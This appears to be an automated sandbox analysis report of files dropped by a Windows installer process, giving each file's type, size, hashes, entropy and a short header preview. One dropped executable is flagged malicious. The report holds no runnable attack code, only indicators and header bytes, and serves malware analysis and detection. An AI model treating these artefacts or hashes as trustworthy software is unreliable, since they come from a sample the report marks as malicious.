                                                                                          SHA-512:A163122DFFE729E6F1CA6EB756A776F6F01A784A488E2ACCE63AEAFA14668E8B1148BE948EB4AF4CA8C5980E85E681960B8A43C94B95DFFC72FCCEE1E170BD9A
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........X...............,...T...............@....@.......................................... .................................@...........................................................PU..........................P............................text....+.......,..................`.P`.data........@.......0..............@.`..rdata..0....P.......2..............@.0@/4...........`.......<..............@.0@.bss.........p........................`..idata..@............J..............@.0..CRT....4............T..............@.0..tls.................V..............@.0.................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):25614
                                                                                          Entropy (8bit):6.0293046975090325
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:MiksLrrN6mRXYYYYYYYYYYYYYYYYYYYYYYYYYI9W0oM:zrHFYYYYYYYYYYYYYYYYYYYYYYYYY70N
                                                                                          MD5:B82364A204396C352F8CC9B2F8ABEF73
                                                                                          SHA1:20AD466787D65C987A9EBDBD4A2E8845E4D37B68
                                                                                          SHA-256:2A64047F9B9B07F6CB22BFE4F9D4A7DB06994B6107B5EA2A7E38FAFA9E282667
                                                                                          SHA-512:C8CAFA4C315CE96D41AD521E72180DF99931B5F448C8647161E7F9DCA29AA07213B9CCEF9E3F7FB5353C7B459E3DA620E560153BDBA1AB529C206330DBD26FF5
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........d.........#....."...`...............@.... g.................................a........ .........................@.......@...............................`............................c.......................................................text.... ......."..................`.P`.data........@.......&..............@.`..rdata.......`.......@..............@.0@/4...........p.......F..............@.0@.bss..................................`..edata..@............T..............@.0@.idata..@............V..............@.0..CRT....,............\..............@.0..tls.................^..............@.0..reloc..`............`..............@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):15374
                                                                                          Entropy (8bit):5.25938266470983
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:l0HhuwYqkoiCBJRgcsZQPCkWa/HI77wbcRODYCpes2n13dwczbUwS7RE8SD:lqhoqkVCXWgI77B0hGnLwczbUwSC8g
                                                                                          MD5:228EE3AFDCC5F75244C0E25050A346CB
                                                                                          SHA1:822B7674D1B7B091C1478ADD2F88E0892542516F
                                                                                          SHA-256:7ACD537F3BE069C7813DA55D6BC27C3A933DF2CF07D29B4120A8DF0C26D26561
                                                                                          SHA-512:7DFA06B9775A176A9893E362B08DA7F2255037DC99FB6BE53020ECD4841C7E873C03BAC11D14914EFDFE84EFEB3FB99745566BB39784962365BEEBDB89A4531B
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0....Xj.......................................... ......................p......................................................................P@......................................................text...$...........................`.P`.data...,....0......................@.0..rdata.......@....... ..............@.0@/4...........P......."..............@.0@.bss.........`........................`..edata.......p......................@.0@.idata...............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):15374
                                                                                          Entropy (8bit):5.25938266470983
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:l0HhuwYqkoiCBJRgcsZQPCkWa/HI77wbcRODYCpes2n13dwczbUwS7RE8SD:lqhoqkVCXWgI77B0hGnLwczbUwSC8g
                                                                                          MD5:228EE3AFDCC5F75244C0E25050A346CB
                                                                                          SHA1:822B7674D1B7B091C1478ADD2F88E0892542516F
                                                                                          SHA-256:7ACD537F3BE069C7813DA55D6BC27C3A933DF2CF07D29B4120A8DF0C26D26561
                                                                                          SHA-512:7DFA06B9775A176A9893E362B08DA7F2255037DC99FB6BE53020ECD4841C7E873C03BAC11D14914EFDFE84EFEB3FB99745566BB39784962365BEEBDB89A4531B
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0....Xj.......................................... ......................p......................................................................P@......................................................text...$...........................`.P`.data...,....0......................@.0..rdata.......@....... ..............@.0@/4...........P......."..............@.0@.bss.........`........................`..edata.......p......................@.0@.idata...............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):25614
                                                                                          Entropy (8bit):6.0293046975090325
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:MiksLrrN6mRXYYYYYYYYYYYYYYYYYYYYYYYYYI9W0oM:zrHFYYYYYYYYYYYYYYYYYYYYYYYYY70N
                                                                                          MD5:B82364A204396C352F8CC9B2F8ABEF73
                                                                                          SHA1:20AD466787D65C987A9EBDBD4A2E8845E4D37B68
                                                                                          SHA-256:2A64047F9B9B07F6CB22BFE4F9D4A7DB06994B6107B5EA2A7E38FAFA9E282667
                                                                                          SHA-512:C8CAFA4C315CE96D41AD521E72180DF99931B5F448C8647161E7F9DCA29AA07213B9CCEF9E3F7FB5353C7B459E3DA620E560153BDBA1AB529C206330DBD26FF5
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........d.........#....."...`...............@.... g.................................a........ .........................@.......@...............................`............................c.......................................................text.... ......."..................`.P`.data........@.......&..............@.`..rdata.......`.......@..............@.0@/4...........p.......F..............@.0@.bss..................................`..edata..@............T..............@.0@.idata..@............V..............@.0..CRT....,............\..............@.0..tls.................^..............@.0..reloc..`............`..............@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):43520
                                                                                          Entropy (8bit):6.232860260916194
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:XozEJVjDF38DrOPwLg0cAY7K+k+Y+TyHMjMbHVJx9jm3LkkteFfXbBekdAnPKx:Xo4JJDirOoLg0C7F/rDGdpB52PK
                                                                                          MD5:B162992412E08888456AE13BA8BD3D90
                                                                                          SHA1:095FA02EB14FD4BD6EA06F112FDAFE97522F9888
                                                                                          SHA-256:2581A6BCA6F4B307658B24A7584A6B300C91E32F2FE06EB1DCA00ADCE60FA723
                                                                                          SHA-512:078594DE66F7E065DCB48DA7C13A6A15F8516800D5CEE14BA267F43DC73BC38779A4A4ED9444AFDFA581523392CBE06B0241AA8EC0148E6BCEA8E23B78486824
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....z.......D................,n.........................p.......`........ ...................... .......0...............................`..............................t........................0...............................text....x.......z..................`.P`.data...,............~..............@.0..rdata..............................@.P@.eh_fram|...........................@.0@.bss.....B............................`..edata....... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):240654
                                                                                          Entropy (8bit):6.518503846592995
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:yZDfF4DjzIHBV+bUeenu+t+oSTdjpNZ7utS81qpHW4paP2L:ekjzMBVKXeuq+oSTdjpr7N8f+L
                                                                                          MD5:4F0C85351AEC4B00300451424DB4B5A4
                                                                                          SHA1:BB66D807EDE0D7D86438207EB850F50126924C9D
                                                                                          SHA-256:CC0B53969670C7275A855557EA16182C932160BC0F8543EFFC570F760AE2185E
                                                                                          SHA-512:80C84403ED47380FF75EBA50A23E565F7E5C68C7BE8C208A5A48B7FB0798FF51F3D33780C902A6F8AB0E6DB328860C071C77B93AC88CADF84FEF7DF34DE3E2DA
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....H...................`.....g.................................\........ .........................o.......\...............................t............................S.......................................................text...dF.......H..................`.P`.data...X....`.......L..............@.P..rdata.......p.......N..............@.`@/4.......<.......>...T..............@.0@.bss..................................`..edata..o...........................@.0@.idata..\...........................@.0..CRT....,...........................@.0..tls................................@.0..reloc..t...........................@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):852754
                                                                                          Entropy (8bit):6.503318968423685
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:fpFFQV+FKJ37Dm+yY4pBkPr2v2meLaoHN/oBrZ3ixdnGVzpJXm/iN:fpnzFw37iDYIBkzuPcHNgrZ3uGVzm/iN
                                                                                          MD5:07FB6D31F37FB1B4164BEF301306C288
                                                                                          SHA1:4CB41AF6D63A07324EF6B18B1A1F43CE94E25626
                                                                                          SHA-256:06DDF0A370AF00D994824605A8E1307BA138F89B2D864539F0D19E8804EDAC02
                                                                                          SHA-512:CAB4A7C5805B80851ABA5F2C9B001FABC1416F6648D891F49EACC81FE79287C5BAA01306A42298DA722750B812A4EA85388FFAE9200DCF656DD1D5B5B9323353
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L..Y.,..v......!......... .....................a................................O}........ ......................................@.......................P..X0...........................0.......................................................text...............................`.P`.data...............................@.`..rdata..............................@.`@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,.... ......................@.0..tls.... ....0......................@.0..rsrc........@......................@.0..reloc..X0...P...2..................@.0B/4...................&..............@.@B/19.................*..............@..B/31..........@......................@..B/45..........`......................@..B/57.................................@.0B/70.....i...............
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):315918
                                                                                          Entropy (8bit):6.5736483262229735
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:zvhrZEi7+khFXxn+m0GJjExfTKqyNwEozbpT80kqD6jD1TlT5Tjalc:zvz17FhtBnLot8XD1T3ac
                                                                                          MD5:201EA988661F3D1F9CA5D93DA83425E7
                                                                                          SHA1:D0294DF7BA1F6CB0290E1EFEBB5B627A11C8B1F5
                                                                                          SHA-256:4E4224B946A584B3D32BBABB8665B67D821BB8D15AB4C1CC4C39C71708298A39
                                                                                          SHA-512:6E6FA44CE2E07177DEC6E62D0BEE5B5D3E23A243D9373FB8C6EEECEC6C6150CBD457ED8B8C84AB29133DFE954550CA972DEC504069CC411BD1193A24EA98AAEE
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).........R...................................................+....@... ......................0.......@.......p......................................................4S......................tA..$............................text...............................`..`.data...............................@....rdata...o.......p..................@..@/4......d`...`...b...D..............@..@.bss.....P...............................edata.......0......................@..@.idata.......@......................@....CRT....,....P......................@....tls.........`......................@....rsrc........p......................@..@.reloc..............................@..B........................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):112640
                                                                                          Entropy (8bit):6.540227486061059
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:45vq1zsdXYjZmGz9anu3MwjLA/eeiUKJP3Djl23HTKJ7WMU3lPyK+ZSrKxV/UJ9G:vzMMg/gMKeGsMIl6K+Zvry5zNY
                                                                                          MD5:BDB65DCE335AC29ECCBC2CA7A7AD36B7
                                                                                          SHA1:CE7678DCF7AF0DBF9649B660DB63DB87325E6F69
                                                                                          SHA-256:7EC9EE07BFD67150D1BC26158000436B63CA8DBB2623095C049E06091FA374C3
                                                                                          SHA-512:8AABCA6BE47A365ACD28DF8224F9B9B5E1654F67E825719286697FB9E1B75478DDDF31671E3921F06632EED5BB3DDA91D81E48D4550C2DCD8E2404D566F1BC29
                                                                                          Malicious:false
                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...N......0u............@.....................................................................2.......v...............................h...................................................................................CODE....Pe.......f.................. ..`DATA....D............j..............@...BSS......................................idata..v...........................@....edata..2...........................@..P.reloc..h...........................@..P.rsrc...............................@..P....................................@..P................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):772608
                                                                                          Entropy (8bit):6.546391052615969
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:Q75mFL0MNnM/SQdtij4UujFhGiNV1SckT3wio2L2jV6EfnQ29mwF3s4iGtInw1m8:AwN0e0lN1fnQUFccGns9ukS6
                                                                                          MD5:B3B487FC3832B607A853211E8AC42CAD
                                                                                          SHA1:06E32C28103D33DAD53BE06C894203F8808D38C1
                                                                                          SHA-256:30BC10BD6E5B2DB1ACE93C2004E24C128D20C242063D4F0889FD3FB3E284A9E4
                                                                                          SHA-512:FA6BDBA4F2A0CF4CCA40A333B69FD041D9EDC0736EDA206F17F10AF5505CC4688B0401A3CAD2D2F69392E752B8877DB593C7872BCDB133DC785A200FF38598BB
                                                                                          Malicious:false
                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....1.d.................D..........$].......`....@.......................................@......@...................0..o............p...(...................`...............................P......................X........ .......................text...h4.......6.................. ..`.itext.......P.......:.............. ..`.data....7...`...8...H..............@....bss....0i...............................idata..............................@....didata...... ......................@....edata..o....0......................@..@.tls.........@...........................rdata..]....P......................@..@.reloc.......`......................@..B.rsrc....(...p...(..................@..@....................................@..@................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):294926
                                                                                          Entropy (8bit):6.191604766067493
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:7E0FFjiAeF21pLQFgK33duKMnlCj3eWyNg2hlNvFXl8rzJjjOjVmdX566Uwqwqwm:wKFX3LygKjjN2HIfpruwqwqwFUgVE
                                                                                          MD5:C76C9AE552E4CE69E3EB9EC380BC0A42
                                                                                          SHA1:EFFEC2973C3D678441AF76CFAA55E781271BD1FB
                                                                                          SHA-256:574595B5FD6223E4A004FA85CBB3588C18CC6B83BF3140D8F94C83D11DBCA7BD
                                                                                          SHA-512:7FB385227E802A0C77749978831245235CD1343B95D97E610D20FB0454241C465387BCCB937A2EE8A2E0B461DD3D2834F7F542E7739D8E428E146F378A24EE97
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.........|.....................n.................................c........ ......................`..j7...........................................................................................................................text...8...........................`.P`.data...x...........................@.0..rdata...F.......H..................@.`@/4.......U.......V..................@.0@.bss.........P........................`..edata..j7...`...8...$..............@.0@.idata...............\..............@.0..CRT....,............b..............@.0..tls.................d..............@.0..reloc...............f..............@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):13838
                                                                                          Entropy (8bit):5.173769974589746
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:oh3ZZBe9xz7rdz9Us5bsRuKUYDpesWAhQqCNhNXUwS7RuLH9+E:ohLBe3dz9UsikKDGZqCNhNXUwS4bcE
                                                                                          MD5:9C55B3E5ED1365E82AE9D5DA3EAEC9F2
                                                                                          SHA1:BB3D30805A84C6F0803BE549C070F21C735E10A9
                                                                                          SHA-256:D2E374DF7122C0676B4618AED537DFC8A7B5714B75D362BFBE85B38F47E3D4A4
                                                                                          SHA-512:EEFE8793309FDC801B1649661B0C17C38406A9DAA1E12959CD20344975747D470D6D9C8BE51A46279A42FE1843C254C432938981D108F4899B93CDD744B5D968
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........6.........#.........2...............0....@m.................................Z........ ......................p..J.......h............................................................@......................................................text...............................`.P`.data...,....0......................@.0..rdata.......@......................@.0@/4...........P......................@.0@.bss.........`........................`..edata..J....p.......(..............@.0@.idata..h............*..............@.0..CRT....,............0..............@.0..tls.................2..............@.0..reloc...............4..............@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):258560
                                                                                          Entropy (8bit):6.491223412910377
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:X+FRYMGwNozw5upAagZnb80OXrGSc+w9nI7ZMcyVhk233M:SGMGbw5upAagZb80SMXzkgM
                                                                                          MD5:DB191B89F4D015B1B9AEE99AC78A7E65
                                                                                          SHA1:8DAC370768E7480481300DD5EBF8BA9CE36E11E3
                                                                                          SHA-256:38A75F86DB58EB8D2A7C0213861860A64833C78F59EFF19141FFD6C3B6E28835
                                                                                          SHA-512:A27E26962B43BA84A5A82238556D06672DCF17931F866D24E6E8DCE88F7B30E80BA38B071943B407A7F150A57CF1DA13D2137C235B902405BEDBE229B6D03784
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.j..f...f...f..]....f..]...f..]....f......f......f......f......f..]....f...f..]f......f......f......f...f...f......f..Rich.f..........PE..L...y.._...........!................@........ ...............................@..........................................d...$...(.......h.................... ......................................(...@............ ..8............................text...q........................... ..`asmcode.>$.......&.................. ..`.rdata..B.... ......................@..@.data...............................@....rsrc...h...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:modified
                                                                                          Size (bytes):2199540
                                                                                          Entropy (8bit):6.34382356471681
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:vWtUNVKKo/Ji9iOu/6fVTC75GvMQ5HwTQKmMEV7anImzSVG61jZJ+WFchgsvKIgX:+t0Z590/6o75QHW7mMwmzialW7R5Z/h
                                                                                          MD5:BB0124F16D88C4EC1FCFD9E524A5B921
                                                                                          SHA1:5017DC7277DBC5BB0B6F8428E4FF72603E3A370B
                                                                                          SHA-256:59495C6E79C301F767F3D336050FB9927826F0AE972D634D395F5B44D7280A09
                                                                                          SHA-512:4BE3E838FB41CD4D01A12B639CDCB93DF94DEEC0DEBD2593C53BBFE977DAF5BCB9E3F97F6C47D33E76AEA12AE2F9224F27652DFB5B5A69F53D201184766FFF91
                                                                                          Malicious:true
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k.....................r.......................................6.......Rich............................PE..L.....ue.................@...................P....@...........................!......."......................................Y..P........G...........................................................................P...............................text....;.......@.................. ..`.rdata.......P... ...P..............@..@.data....P...p...0...p..............@....rsrc....G.......P..................@..@.hsave....... ......................`...................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):2199540
                                                                                          Entropy (8bit):6.343823195460407
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:EWtUNVKKo/Ji9iOu/6fVTC75GvMQ5HwTQKmMEV7anImzSVG61jZJ+WFchgsvKIgX:zt0Z590/6o75QHW7mMwmzialW7R5Z/h
                                                                                          MD5:EB732B105CEAE8D6D08B309621C239F5
                                                                                          SHA1:B673ABD9B9A11193DE071C3C98B372A0EEFD2C50
                                                                                          SHA-256:839DC7452F0E0FD9328B4A19800F630B29AFFDF7D7F30A93E3F19364CB30A1ED
                                                                                          SHA-512:F8BC354CA40CC6F47535E60D66B1907A711D28DC3C5822CFD1F461C6173D171358B8BD0FCC912A0AB74CA4046313703D451167544F79A7C182221CF5FEFD4691
                                                                                          Malicious:false
                                                                                          Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k.....................r.......................................6.......Rich............................PE..L.....ue.................@...................P....@...........................!......."......................................Y..P........G...........................................................................P...............................text....;.......@.................. ..`.rdata.......P... ...P..............@..@.data....P...p...0...p..............@....rsrc....G.......P..................@..@.hsave....... ......................`...................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:IFF data
                                                                                          Category:dropped
                                                                                          Size (bytes):1716
                                                                                          Entropy (8bit):4.781797138644031
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
                                                                                          MD5:257D1BF38FA7859FFC3717EF36577C04
                                                                                          SHA1:A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
                                                                                          SHA-256:DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
                                                                                          SHA-512:E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
                                                                                          Malicious:false
                                                                                          Preview:FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:IFF data
                                                                                          Category:dropped
                                                                                          Size (bytes):1716
                                                                                          Entropy (8bit):4.781797138644031
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
                                                                                          MD5:257D1BF38FA7859FFC3717EF36577C04
                                                                                          SHA1:A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
                                                                                          SHA-256:DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
                                                                                          SHA-512:E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
                                                                                          Malicious:false
                                                                                          Preview:FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1825
                                                                                          Entropy (8bit):5.088030483893024
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
                                                                                          MD5:992C00BEAB194CE392117BB419F53051
                                                                                          SHA1:8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
                                                                                          SHA-256:9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
                                                                                          SHA-512:FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
                                                                                          Malicious:false
                                                                                          Preview:.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1825
                                                                                          Entropy (8bit):5.088030483893024
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
                                                                                          MD5:992C00BEAB194CE392117BB419F53051
                                                                                          SHA1:8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
                                                                                          SHA-256:9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
                                                                                          SHA-512:FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
                                                                                          Malicious:false
                                                                                          Preview:.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:IFF data
                                                                                          Category:dropped
                                                                                          Size (bytes):1716
                                                                                          Entropy (8bit):4.781797138644031
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
